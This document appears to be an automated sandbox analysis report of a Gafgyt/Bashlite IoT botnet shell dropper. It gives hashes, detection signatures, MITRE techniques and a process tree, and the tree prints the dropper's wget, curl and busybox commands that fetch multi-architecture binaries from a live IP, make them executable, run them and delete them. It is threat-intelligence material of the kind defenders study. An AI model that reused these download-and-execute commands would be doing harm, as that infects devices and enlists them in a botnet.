gafgyt | 6594875b01074eed48ca4021e4079aefb23565c88d5eccab3939241746347417

Analysis

max time kernel
149s
max time network
152s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
08-12-2024 02:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6594875b01074eed48ca4021e4079aefb23565c88d5eccab3939241746347417.sh
Size

6KB
MD5

b853a7496951ffa293c154a1c2ab0cef
SHA1

cd23d84bfa383cb3eef6b8a210a755323d278068
SHA256

6594875b01074eed48ca4021e4079aefb23565c88d5eccab3939241746347417
SHA512

315201607fbfeb29173ced022cebb46a1c936377bb62407fdb73bb9a65426e24aff333c7e727e5fbb7351de6f71f919e1dcec3204b41d01d781dfcfc171bab18
SSDEEP

96:vl0lolAlUlElAlwlclElElglUl6LlbzPnTjn37jjHTLXjTp+FH7RjdOMX+xj+wqd:oMVB3

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Signatures

Detected Gafgyt variant 13 IoCs

resource	yara_rule
behavioral1/files/fstream-1.dat	family_gafgyt
behavioral1/files/fstream-2.dat	family_gafgyt
behavioral1/files/fstream-3.dat	family_gafgyt
behavioral1/files/fstream-4.dat	family_gafgyt
behavioral1/files/fstream-5.dat	family_gafgyt
behavioral1/files/fstream-6.dat	family_gafgyt
behavioral1/files/fstream-7.dat	family_gafgyt
behavioral1/files/fstream-8.dat	family_gafgyt
behavioral1/files/fstream-9.dat	family_gafgyt
behavioral1/files/fstream-10.dat	family_gafgyt
behavioral1/files/fstream-11.dat	family_gafgyt
behavioral1/files/fstream-12.dat	family_gafgyt
behavioral1/files/fstream-13.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 54 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1530	chmod
1555	chmod
1559	chmod
1712	chmod
1729	chmod
1499	chmod
1598	chmod
1746	chmod
1506	chmod
1523	chmod
1634	chmod
1642	chmod
1674	chmod
1511	chmod
1574	chmod
1662	chmod
1550	chmod
1615	chmod
1690	chmod
1625	chmod
1695	chmod
1545	chmod
1610	chmod
1682	chmod
1686	chmod
1717	chmod
1483	chmod
1489	chmod
1678	chmod
1724	chmod
1736	chmod
1535	chmod
1581	chmod
1569	chmod
1593	chmod
1741	chmod
1518	chmod
1586	chmod
1654	chmod
1670	chmod
1751	chmod
1564	chmod
1605	chmod
1630	chmod
1650	chmod
1666	chmod
1638	chmod
1646	chmod
1658	chmod
1705	chmod
1494	chmod
1540	chmod
1620	chmod
1700	chmod

Executes dropped EXE 52 IoCs

ioc	pid	Process
/tmp/m-.ips	1484	m-.ips
/tmp/m-i.p.-se.l	1490	m-i.p.-se.l
/tmp/s-..-h-.4	1495	s-..-h-.4
/tmp/x.8-.-6.-	1500	x.8-.-6.-
/tmp/a.-r.-m6	1507	a.-r.-m6
/tmp/i--6.-.86	1512	i--6.-.86
/tmp/p--.-pc	1519	p--.-pc
/tmp/i5.-.8..-6	1524	i5.-.8..-6
/tmp/m.-..-6-.-8k	1531	m.-..-6-.-8k
/tmp/s-.-pa.-rc	1536	s-.-pa.-rc
/tmp/a-.-r.-m.-4	1541	a-.-r.-m.-4
/tmp/a.-.--.r.--m-.--5	1546	a.-.--.r.--m-.--5
/tmp/a.r.-.m7	1551	a.r.-.m7
/tmp/m-.ips	1560	m-.ips
/tmp/m-i.p.-se.l	1565	m-i.p.-se.l
/tmp/s-..-h-.4	1570	s-..-h-.4
/tmp/x.8-.-6.-	1575	x.8-.-6.-
/tmp/a.-r.-m6	1582	a.-r.-m6
/tmp/i--6.-.86	1587	i--6.-.86
/tmp/p--.-pc	1594	p--.-pc
/tmp/i5.-.8..-6	1599	i5.-.8..-6
/tmp/m.-..-6-.-8k	1606	m.-..-6-.-8k
/tmp/s-.-pa.-rc	1611	s-.-pa.-rc
/tmp/a-.-r.-m.-4	1616	a-.-r.-m.-4
/tmp/a.-.--.r.--m-.--5	1621	a.-.--.r.--m-.--5
/tmp/a.r.-.m7	1626	a.r.-.m7
/tmp/p-.-.p.-.c	1631	p-.-.p.-.c
/tmp/m-.ips	1635	m-.ips
/tmp/m-i.p.-se.l	1639	m-i.p.-se.l
/tmp/s-..-h-.4	1643	s-..-h-.4
/tmp/x.8-.-6.-	1647	x.8-.-6.-
/tmp/a.-r.-m6	1651	a.-r.-m6
/tmp/i--6.-.86	1655	i--6.-.86
/tmp/p--.-pc	1659	p--.-pc
/tmp/i5.-.8..-6	1663	i5.-.8..-6
/tmp/m.-..-6-.-8k	1667	m.-..-6-.-8k
/tmp/s-.-pa.-rc	1671	s-.-pa.-rc
/tmp/a-.-r.-m.-4	1675	a-.-r.-m.-4
/tmp/a.-.--.r.--m-.--5	1679	a.-.--.r.--m-.--5
/tmp/a.r.-.m7	1683	a.r.-.m7
/tmp/p-.-.p.-.c	1687	p-.-.p.-.c
/tmp/m-.ips	1691	m-.ips
/tmp/m-i.p.-se.l	1696	m-i.p.-se.l
/tmp/s-..-h-.4	1701	s-..-h-.4
/tmp/x.8-.-6.-	1706	x.8-.-6.-
/tmp/a.-r.-m6	1713	a.-r.-m6
/tmp/i--6.-.86	1718	i--6.-.86
/tmp/p--.-pc	1725	p--.-pc
/tmp/i5.-.8..-6	1730	i5.-.8..-6
/tmp/m.-..-6-.-8k	1737	m.-..-6-.-8k
/tmp/s-.-pa.-rc	1742	s-.-pa.-rc
/tmp/a-.-r.-m.-4	1747	a-.-r.-m.-4

Modifies Watchdog functionality 1 TTPs 18 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	i--6.-.86
File opened for modification	/dev/misc/watchdog	i5.-.8..-6
File opened for modification	/dev/watchdog	x.8-.-6.-
File opened for modification	/dev/watchdog	i--6.-.86
File opened for modification	/dev/watchdog	i5.-.8..-6
File opened for modification	/dev/watchdog	x.8-.-6.-
File opened for modification	/dev/misc/watchdog	x.8-.-6.-
File opened for modification	/dev/watchdog	i5.-.8..-6
File opened for modification	/dev/misc/watchdog	i--6.-.86
File opened for modification	/dev/watchdog	i5.-.8..-6
File opened for modification	/dev/watchdog	x.8-.-6.-
File opened for modification	/dev/misc/watchdog	i5.-.8..-6
File opened for modification	/dev/misc/watchdog	i5.-.8..-6
File opened for modification	/dev/misc/watchdog	x.8-.-6.-
File opened for modification	/dev/misc/watchdog	i--6.-.86
File opened for modification	/dev/misc/watchdog	x.8-.-6.-
File opened for modification	/dev/watchdog	i--6.-.86
File opened for modification	/dev/misc/watchdog	i--6.-.86

Reads system routing table 1 TTPs 9 IoCs

Gets active network interfaces from /proc virtual filesystem.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	i5.-.8..-6
File opened for reading	/proc/net/route	i5.-.8..-6
File opened for reading	/proc/net/route	i5.-.8..-6
File opened for reading	/proc/net/route	i--6.-.86
File opened for reading	/proc/net/route	x.8-.-6.-
File opened for reading	/proc/net/route	i--6.-.86
File opened for reading	/proc/net/route	x.8-.-6.-
File opened for reading	/proc/net/route	i--6.-.86
File opened for reading	/proc/net/route	x.8-.-6.-

Changes its process name 9 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	sshd	1500	x.8-.-6.-
Changes the process name, possibly in an attempt to hide itself	sshd	1512	i--6.-.86
Changes the process name, possibly in an attempt to hide itself	sshd	1524	i5.-.8..-6
Changes the process name, possibly in an attempt to hide itself	sshd	1575	x.8-.-6.-
Changes the process name, possibly in an attempt to hide itself	sshd	1587	i--6.-.86
Changes the process name, possibly in an attempt to hide itself	sshd	1599	i5.-.8..-6
Changes the process name, possibly in an attempt to hide itself	sshd	1706	x.8-.-6.-
Changes the process name, possibly in an attempt to hide itself	sshd	1718	i--6.-.86
Changes the process name, possibly in an attempt to hide itself	sshd	1730	i5.-.8..-6

Reads system network configuration 1 TTPs 9 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	i--6.-.86
File opened for reading	/proc/net/route	i5.-.8..-6
File opened for reading	/proc/net/route	i5.-.8..-6
File opened for reading	/proc/net/route	i5.-.8..-6
File opened for reading	/proc/net/route	x.8-.-6.-
File opened for reading	/proc/net/route	i--6.-.86
File opened for reading	/proc/net/route	x.8-.-6.-
File opened for reading	/proc/net/route	x.8-.-6.-
File opened for reading	/proc/net/route	i--6.-.86

System Network Configuration Discovery 1 TTPs 11 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1689	busybox
1691	m-.ips
1693	rm
1558	curl
1636	rm
1486	rm
1560	m-.ips
1562	rm
1635	m-.ips
1479	wget
1484	m-.ips

Writes file to tmp directory 39 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/x.8-.-6.-	wget
File opened for modification	/tmp/p--.-pc	wget
File opened for modification	/tmp/m.-..-6-.-8k	wget
File opened for modification	/tmp/m-i.p.-se.l	curl
File opened for modification	/tmp/a.r.-.m7	curl
File opened for modification	/tmp/m-.ips	busybox
File opened for modification	/tmp/i--6.-.86	busybox
File opened for modification	/tmp/m-i.p.-se.l	wget
File opened for modification	/tmp/s-..-h-.4	busybox
File opened for modification	/tmp/a.-r.-m6	busybox
File opened for modification	/tmp/m-.ips	wget
File opened for modification	/tmp/a-.-r.-m.-4	wget
File opened for modification	/tmp/m-.ips	curl
File opened for modification	/tmp/p--.-pc	curl
File opened for modification	/tmp/a.-.--.r.--m-.--5	curl
File opened for modification	/tmp/m.-..-6-.-8k	busybox
File opened for modification	/tmp/a.-r.-m6	wget
File opened for modification	/tmp/a.r.-.m7	wget
File opened for modification	/tmp/a-.-r.-m.-4	curl
File opened for modification	/tmp/m-i.p.-se.l	busybox
File opened for modification	/tmp/a-.-r.-m.-4	busybox
File opened for modification	/tmp/s-..-h-.4	wget
File opened for modification	/tmp/i--6.-.86	wget
File opened for modification	/tmp/i--6.-.86	curl
File opened for modification	/tmp/s-.-pa.-rc	curl
File opened for modification	/tmp/p--.-pc	busybox
File opened for modification	/tmp/s-.-pa.-rc	wget
File opened for modification	/tmp/a.-.--.r.--m-.--5	wget
File opened for modification	/tmp/m.-..-6-.-8k	curl
File opened for modification	/tmp/p-.-.p.-.c	curl
File opened for modification	/tmp/s-.-pa.-rc	busybox
File opened for modification	/tmp/i5.-.8..-6	busybox
File opened for modification	/tmp/i5.-.8..-6	wget
File opened for modification	/tmp/s-..-h-.4	curl
File opened for modification	/tmp/x.8-.-6.-	curl
File opened for modification	/tmp/a.-r.-m6	curl
File opened for modification	/tmp/i5.-.8..-6	curl
File opened for modification	/tmp/x.8-.-6.-	busybox
File opened for modification	/tmp/a.-.--.r.--m-.--5	busybox

/tmp/6594875b01074eed48ca4021e4079aefb23565c88d5eccab3939241746347417.sh
/tmp/6594875b01074eed48ca4021e4079aefb23565c88d5eccab3939241746347417.sh
1⤵
PID:1478
- /usr/bin/wget
  wget http://93.123.85.60/m-.ips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1479
- /bin/chmod
  chmod +x m-.ips
  2⤵
  - File and Directory Permissions Modification
  PID:1483
- /tmp/m-.ips
  ./m-.ips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:1484
- /bin/rm
  rm -rf m-.ips
  2⤵
  - System Network Configuration Discovery
  PID:1486
- /usr/bin/wget
  wget http://93.123.85.60/m-i.p.-se.l
  2⤵
  - Writes file to tmp directory
  PID:1487
- /bin/chmod
  chmod +x m-i.p.-se.l
  2⤵
  - File and Directory Permissions Modification
  PID:1489
- /tmp/m-i.p.-se.l
  ./m-i.p.-se.l
  2⤵
  - Executes dropped EXE
  PID:1490
- /bin/rm
  rm -rf m-i.p.-se.l
  2⤵
  PID:1492
- /usr/bin/wget
  wget http://93.123.85.60/s-..-h-.4
  2⤵
  - Writes file to tmp directory
  PID:1493
- /bin/chmod
  chmod +x s-..-h-.4
  2⤵
  - File and Directory Permissions Modification
  PID:1494
- /tmp/s-..-h-.4
  ./s-..-h-.4
  2⤵
  - Executes dropped EXE
  PID:1495
- /bin/rm
  rm -rf s-..-h-.4
  2⤵
  PID:1497
- /usr/bin/wget
  wget http://93.123.85.60/x.8-.-6.-
  2⤵
  - Writes file to tmp directory
  PID:1498
- /bin/chmod
  chmod +x x.8-.-6.-
  2⤵
  - File and Directory Permissions Modification
  PID:1499
- /tmp/x.8-.-6.-
  ./x.8-.-6.-
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Reads system routing table
  - Changes its process name
  - Reads system network configuration
  PID:1500
- /bin/rm
  rm -rf x.8-.-6.-
  2⤵
  PID:1504
- /usr/bin/wget
  wget http://93.123.85.60/a.-r.-m6
  2⤵
  - Writes file to tmp directory
  PID:1505
- /bin/chmod
  chmod +x a.-r.-m6
  2⤵
  - File and Directory Permissions Modification
  PID:1506
- /tmp/a.-r.-m6
  ./a.-r.-m6
  2⤵
  - Executes dropped EXE
  PID:1507
- /bin/rm
  rm -rf a.-r.-m6
  2⤵
  PID:1509
- /usr/bin/wget
  wget http://93.123.85.60/i--6.-.86
  2⤵
  - Writes file to tmp directory
  PID:1510
- /bin/chmod
  chmod +x i--6.-.86
  2⤵
  - File and Directory Permissions Modification
  PID:1511
- /tmp/i--6.-.86
  ./i--6.-.86
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Reads system routing table
  - Changes its process name
  - Reads system network configuration
  PID:1512
- /bin/rm
  rm -rf i--6.-.86
  2⤵
  PID:1516
- /usr/bin/wget
  wget http://93.123.85.60/p--.-pc
  2⤵
  - Writes file to tmp directory
  PID:1517
- /bin/chmod
  chmod +x p--.-pc
  2⤵
  - File and Directory Permissions Modification
  PID:1518
- /tmp/p--.-pc
  ./p--.-pc
  2⤵
  - Executes dropped EXE
  PID:1519
- /bin/rm
  rm -rf p--.-pc
  2⤵
  PID:1521
- /usr/bin/wget
  wget http://93.123.85.60/i5.-.8..-6
  2⤵
  - Writes file to tmp directory
  PID:1522
- /bin/chmod
  chmod +x i5.-.8..-6
  2⤵
  - File and Directory Permissions Modification
  PID:1523
- /tmp/i5.-.8..-6
  ./i5.-.8..-6
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Reads system routing table
  - Changes its process name
  - Reads system network configuration
  PID:1524
- /bin/rm
  rm -rf i5.-.8..-6
  2⤵
  PID:1528
- /usr/bin/wget
  wget http://93.123.85.60/m.-..-6-.-8k
  2⤵
  - Writes file to tmp directory
  PID:1529
- /bin/chmod
  chmod +x m.-..-6-.-8k
  2⤵
  - File and Directory Permissions Modification
  PID:1530
- /tmp/m.-..-6-.-8k
  ./m.-..-6-.-8k
  2⤵
  - Executes dropped EXE
  PID:1531
- /bin/rm
  rm -rf m.-..-6-.-8k
  2⤵
  PID:1533
- /usr/bin/wget
  wget http://93.123.85.60/s-.-pa.-rc
  2⤵
  - Writes file to tmp directory
  PID:1534
- /bin/chmod
  chmod +x s-.-pa.-rc
  2⤵
  - File and Directory Permissions Modification
  PID:1535
- /tmp/s-.-pa.-rc
  ./s-.-pa.-rc
  2⤵
  - Executes dropped EXE
  PID:1536
- /bin/rm
  rm -rf s-.-pa.-rc
  2⤵
  PID:1538
- /usr/bin/wget
  wget http://93.123.85.60/a-.-r.-m.-4
  2⤵
  - Writes file to tmp directory
  PID:1539
- /bin/chmod
  chmod +x a-.-r.-m.-4
  2⤵
  - File and Directory Permissions Modification
  PID:1540
- /tmp/a-.-r.-m.-4
  ./a-.-r.-m.-4
  2⤵
  - Executes dropped EXE
  PID:1541
- /bin/rm
  rm -rf a-.-r.-m.-4
  2⤵
  PID:1543
- /usr/bin/wget
  wget http://93.123.85.60/a.-.--.r.--m-.--5
  2⤵
  - Writes file to tmp directory
  PID:1544
- /bin/chmod
  chmod +x a.-.--.r.--m-.--5
  2⤵
  - File and Directory Permissions Modification
  PID:1545
- /tmp/a.-.--.r.--m-.--5
  ./a.-.--.r.--m-.--5
  2⤵
  - Executes dropped EXE
  PID:1546
- /bin/rm
  rm -rf a.-.--.r.--m-.--5
  2⤵
  PID:1548
- /usr/bin/wget
  wget http://93.123.85.60/a.r.-.m7
  2⤵
  - Writes file to tmp directory
  PID:1549
- /bin/chmod
  chmod +x a.r.-.m7
  2⤵
  - File and Directory Permissions Modification
  PID:1550
- /tmp/a.r.-.m7
  ./a.r.-.m7
  2⤵
  - Executes dropped EXE
  PID:1551
- /bin/rm
  rm -rf a.r.-.m7
  2⤵
  PID:1553
- /usr/bin/wget
  wget http://93.123.85.60/p-.-.p.-.c
  2⤵
  PID:1554
- /bin/chmod
  chmod +x p-.-.p.-.c
  2⤵
  - File and Directory Permissions Modification
  PID:1555
- /tmp/p-.-.p.-.c
  ./p-.-.p.-.c
  2⤵
  PID:1556
- /bin/rm
  rm -rf p-.-.p.-.c
  2⤵
  PID:1557
- /usr/bin/curl
  curl -O http://93.123.85.60/m-.ips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1558
- /bin/chmod
  chmod +x m-.ips
  2⤵
  - File and Directory Permissions Modification
  PID:1559
- /tmp/m-.ips
  ./m-.ips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:1560
- /bin/rm
  rm -rf m-.ips
  2⤵
  - System Network Configuration Discovery
  PID:1562
- /usr/bin/curl
  curl -O http://93.123.85.60/m-i.p.-se.l
  2⤵
  - Writes file to tmp directory
  PID:1563
- /bin/chmod
  chmod +x m-i.p.-se.l
  2⤵
  - File and Directory Permissions Modification
  PID:1564
- /tmp/m-i.p.-se.l
  ./m-i.p.-se.l
  2⤵
  - Executes dropped EXE
  PID:1565
- /bin/rm
  rm -rf m-i.p.-se.l
  2⤵
  PID:1567
- /usr/bin/curl
  curl -O http://93.123.85.60/s-..-h-.4
  2⤵
  - Writes file to tmp directory
  PID:1568
- /bin/chmod
  chmod +x s-..-h-.4
  2⤵
  - File and Directory Permissions Modification
  PID:1569
- /tmp/s-..-h-.4
  ./s-..-h-.4
  2⤵
  - Executes dropped EXE
  PID:1570
- /bin/rm
  rm -rf s-..-h-.4
  2⤵
  PID:1572
- /usr/bin/curl
  curl -O http://93.123.85.60/x.8-.-6.-
  2⤵
  - Writes file to tmp directory
  PID:1573
- /bin/chmod
  chmod +x x.8-.-6.-
  2⤵
  - File and Directory Permissions Modification
  PID:1574
- /tmp/x.8-.-6.-
  ./x.8-.-6.-
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Reads system routing table
  - Changes its process name
  - Reads system network configuration
  PID:1575
- /bin/rm
  rm -rf x.8-.-6.-
  2⤵
  PID:1579
- /usr/bin/curl
  curl -O http://93.123.85.60/a.-r.-m6
  2⤵
  - Writes file to tmp directory
  PID:1580
- /bin/chmod
  chmod +x a.-r.-m6
  2⤵
  - File and Directory Permissions Modification
  PID:1581
- /tmp/a.-r.-m6
  ./a.-r.-m6
  2⤵
  - Executes dropped EXE
  PID:1582
- /bin/rm
  rm -rf a.-r.-m6
  2⤵
  PID:1584
- /usr/bin/curl
  curl -O http://93.123.85.60/i--6.-.86
  2⤵
  - Writes file to tmp directory
  PID:1585
- /bin/chmod
  chmod +x i--6.-.86
  2⤵
  - File and Directory Permissions Modification
  PID:1586
- /tmp/i--6.-.86
  ./i--6.-.86
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Reads system routing table
  - Changes its process name
  - Reads system network configuration
  PID:1587
- /bin/rm
  rm -rf i--6.-.86
  2⤵
  PID:1591
- /usr/bin/curl
  curl -O http://93.123.85.60/p--.-pc
  2⤵
  - Writes file to tmp directory
  PID:1592
- /bin/chmod
  chmod +x p--.-pc
  2⤵
  - File and Directory Permissions Modification
  PID:1593
- /tmp/p--.-pc
  ./p--.-pc
  2⤵
  - Executes dropped EXE
  PID:1594
- /bin/rm
  rm -rf p--.-pc
  2⤵
  PID:1596
- /usr/bin/curl
  curl -O http://93.123.85.60/i5.-.8..-6
  2⤵
  - Writes file to tmp directory
  PID:1597
- /bin/chmod
  chmod +x i5.-.8..-6
  2⤵
  - File and Directory Permissions Modification
  PID:1598
- /tmp/i5.-.8..-6
  ./i5.-.8..-6
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Reads system routing table
  - Changes its process name
  - Reads system network configuration
  PID:1599
- /bin/rm
  rm -rf i5.-.8..-6
  2⤵
  PID:1603
- /usr/bin/curl
  curl -O http://93.123.85.60/m.-..-6-.-8k
  2⤵
  - Writes file to tmp directory
  PID:1604
- /bin/chmod
  chmod +x m.-..-6-.-8k
  2⤵
  - File and Directory Permissions Modification
  PID:1605
- /tmp/m.-..-6-.-8k
  ./m.-..-6-.-8k
  2⤵
  - Executes dropped EXE
  PID:1606
- /bin/rm
  rm -rf m.-..-6-.-8k
  2⤵
  PID:1608
- /usr/bin/curl
  curl -O http://93.123.85.60/s-.-pa.-rc
  2⤵
  - Writes file to tmp directory
  PID:1609
- /bin/chmod
  chmod +x s-.-pa.-rc
  2⤵
  - File and Directory Permissions Modification
  PID:1610
- /tmp/s-.-pa.-rc
  ./s-.-pa.-rc
  2⤵
  - Executes dropped EXE
  PID:1611
- /bin/rm
  rm -rf s-.-pa.-rc
  2⤵
  PID:1613
- /usr/bin/curl
  curl -O http://93.123.85.60/a-.-r.-m.-4
  2⤵
  - Writes file to tmp directory
  PID:1614
- /bin/chmod
  chmod +x a-.-r.-m.-4
  2⤵
  - File and Directory Permissions Modification
  PID:1615
- /tmp/a-.-r.-m.-4
  ./a-.-r.-m.-4
  2⤵
  - Executes dropped EXE
  PID:1616
- /bin/rm
  rm -rf a-.-r.-m.-4
  2⤵
  PID:1618
- /usr/bin/curl
  curl -O http://93.123.85.60/a.-.--.r.--m-.--5
  2⤵
  - Writes file to tmp directory
  PID:1619
- /bin/chmod
  chmod +x a.-.--.r.--m-.--5
  2⤵
  - File and Directory Permissions Modification
  PID:1620
- /tmp/a.-.--.r.--m-.--5
  ./a.-.--.r.--m-.--5
  2⤵
  - Executes dropped EXE
  PID:1621
- /bin/rm
  rm -rf a.-.--.r.--m-.--5
  2⤵
  PID:1623
- /usr/bin/curl
  curl -O http://93.123.85.60/a.r.-.m7
  2⤵
  - Writes file to tmp directory
  PID:1624
- /bin/chmod
  chmod +x a.r.-.m7
  2⤵
  - File and Directory Permissions Modification
  PID:1625
- /tmp/a.r.-.m7
  ./a.r.-.m7
  2⤵
  - Executes dropped EXE
  PID:1626
- /bin/rm
  rm -rf a.r.-.m7
  2⤵
  PID:1628
- /usr/bin/curl
  curl -O http://93.123.85.60/p-.-.p.-.c
  2⤵
  - Writes file to tmp directory
  PID:1629
- /bin/chmod
  chmod +x p-.-.p.-.c
  2⤵
  - File and Directory Permissions Modification
  PID:1630
- /tmp/p-.-.p.-.c
  ./p-.-.p.-.c
  2⤵
  - Executes dropped EXE
  PID:1631
- /bin/rm
  rm -rf p-.-.p.-.c
  2⤵
  PID:1632
- /bin/chmod
  chmod +x m-.ips
  2⤵
  - File and Directory Permissions Modification
  PID:1634
- /tmp/m-.ips
  ./m-.ips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:1635
- /bin/rm
  rm -rf m-.ips
  2⤵
  - System Network Configuration Discovery
  PID:1636
- /bin/chmod
  chmod +x m-i.p.-se.l
  2⤵
  - File and Directory Permissions Modification
  PID:1638
- /tmp/m-i.p.-se.l
  ./m-i.p.-se.l
  2⤵
  - Executes dropped EXE
  PID:1639
- /bin/rm
  rm -rf m-i.p.-se.l
  2⤵
  PID:1640
- /bin/chmod
  chmod +x s-..-h-.4
  2⤵
  - File and Directory Permissions Modification
  PID:1642
- /tmp/s-..-h-.4
  ./s-..-h-.4
  2⤵
  - Executes dropped EXE
  PID:1643
- /bin/rm
  rm -rf s-..-h-.4
  2⤵
  PID:1644
- /bin/chmod
  chmod +x x.8-.-6.-
  2⤵
  - File and Directory Permissions Modification
  PID:1646
- /tmp/x.8-.-6.-
  ./x.8-.-6.-
  2⤵
  - Executes dropped EXE
  PID:1647
- /bin/rm
  rm -rf x.8-.-6.-
  2⤵
  PID:1648
- /bin/chmod
  chmod +x a.-r.-m6
  2⤵
  - File and Directory Permissions Modification
  PID:1650
- /tmp/a.-r.-m6
  ./a.-r.-m6
  2⤵
  - Executes dropped EXE
  PID:1651
- /bin/rm
  rm -rf a.-r.-m6
  2⤵
  PID:1652
- /bin/chmod
  chmod +x i--6.-.86
  2⤵
  - File and Directory Permissions Modification
  PID:1654
- /tmp/i--6.-.86
  ./i--6.-.86
  2⤵
  - Executes dropped EXE
  PID:1655
- /bin/rm
  rm -rf i--6.-.86
  2⤵
  PID:1656
- /bin/chmod
  chmod +x p--.-pc
  2⤵
  - File and Directory Permissions Modification
  PID:1658
- /tmp/p--.-pc
  ./p--.-pc
  2⤵
  - Executes dropped EXE
  PID:1659
- /bin/rm
  rm -rf p--.-pc
  2⤵
  PID:1660
- /bin/chmod
  chmod +x i5.-.8..-6
  2⤵
  - File and Directory Permissions Modification
  PID:1662
- /tmp/i5.-.8..-6
  ./i5.-.8..-6
  2⤵
  - Executes dropped EXE
  PID:1663
- /bin/rm
  rm -rf i5.-.8..-6
  2⤵
  PID:1664
- /bin/chmod
  chmod +x m.-..-6-.-8k
  2⤵
  - File and Directory Permissions Modification
  PID:1666
- /tmp/m.-..-6-.-8k
  ./m.-..-6-.-8k
  2⤵
  - Executes dropped EXE
  PID:1667
- /bin/rm
  rm -rf m.-..-6-.-8k
  2⤵
  PID:1668
- /bin/chmod
  chmod +x s-.-pa.-rc
  2⤵
  - File and Directory Permissions Modification
  PID:1670
- /tmp/s-.-pa.-rc
  ./s-.-pa.-rc
  2⤵
  - Executes dropped EXE
  PID:1671
- /bin/rm
  rm -rf s-.-pa.-rc
  2⤵
  PID:1672
- /bin/chmod
  chmod +x a-.-r.-m.-4
  2⤵
  - File and Directory Permissions Modification
  PID:1674
- /tmp/a-.-r.-m.-4
  ./a-.-r.-m.-4
  2⤵
  - Executes dropped EXE
  PID:1675
- /bin/rm
  rm -rf a-.-r.-m.-4
  2⤵
  PID:1676
- /bin/chmod
  chmod +x a.-.--.r.--m-.--5
  2⤵
  - File and Directory Permissions Modification
  PID:1678
- /tmp/a.-.--.r.--m-.--5
  ./a.-.--.r.--m-.--5
  2⤵
  - Executes dropped EXE
  PID:1679
- /bin/rm
  rm -rf a.-.--.r.--m-.--5
  2⤵
  PID:1680
- /bin/chmod
  chmod +x a.r.-.m7
  2⤵
  - File and Directory Permissions Modification
  PID:1682
- /tmp/a.r.-.m7
  ./a.r.-.m7
  2⤵
  - Executes dropped EXE
  PID:1683
- /bin/rm
  rm -rf a.r.-.m7
  2⤵
  PID:1684
- /bin/chmod
  chmod +x p-.-.p.-.c
  2⤵
  - File and Directory Permissions Modification
  PID:1686
- /tmp/p-.-.p.-.c
  ./p-.-.p.-.c
  2⤵
  - Executes dropped EXE
  PID:1687
- /bin/rm
  rm -rf p-.-.p.-.c
  2⤵
  PID:1688
- /bin/busybox
  busybox wget -O m-.ips http://93.123.85.60/m-.ips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1689
- /bin/chmod
  chmod +x m-.ips
  2⤵
  - File and Directory Permissions Modification
  PID:1690
- /tmp/m-.ips
  ./m-.ips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:1691
- /bin/rm
  rm -rf m-.ips
  2⤵
  - System Network Configuration Discovery
  PID:1693
- /bin/busybox
  busybox wget -O m-i.p.-se.l http://93.123.85.60/m-i.p.-se.l
  2⤵
  - Writes file to tmp directory
  PID:1694
- /bin/chmod
  chmod +x m-i.p.-se.l
  2⤵
  - File and Directory Permissions Modification
  PID:1695
- /tmp/m-i.p.-se.l
  ./m-i.p.-se.l
  2⤵
  - Executes dropped EXE
  PID:1696
- /bin/rm
  rm -rf m-i.p.-se.l
  2⤵
  PID:1698
- /bin/busybox
  busybox wget -O s-..-h-.4 http://93.123.85.60/s-..-h-.4
  2⤵
  - Writes file to tmp directory
  PID:1699
- /bin/chmod
  chmod +x s-..-h-.4
  2⤵
  - File and Directory Permissions Modification
  PID:1700
- /tmp/s-..-h-.4
  ./s-..-h-.4
  2⤵
  - Executes dropped EXE
  PID:1701
- /bin/rm
  rm -rf s-..-h-.4
  2⤵
  PID:1703
- /bin/busybox
  busybox wget -O x.8-.-6.- http://93.123.85.60/x.8-.-6.-
  2⤵
  - Writes file to tmp directory
  PID:1704
- /bin/chmod
  chmod +x x.8-.-6.-
  2⤵
  - File and Directory Permissions Modification
  PID:1705
- /tmp/x.8-.-6.-
  ./x.8-.-6.-
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Reads system routing table
  - Changes its process name
  - Reads system network configuration
  PID:1706
- /bin/rm
  rm -rf x.8-.-6.-
  2⤵
  PID:1710
- /bin/busybox
  busybox wget -O a.-r.-m6 http://93.123.85.60/a.-r.-m6
  2⤵
  - Writes file to tmp directory
  PID:1711
- /bin/chmod
  chmod +x a.-r.-m6
  2⤵
  - File and Directory Permissions Modification
  PID:1712
- /tmp/a.-r.-m6
  ./a.-r.-m6
  2⤵
  - Executes dropped EXE
  PID:1713
- /bin/rm
  rm -rf a.-r.-m6
  2⤵
  PID:1715
- /bin/busybox
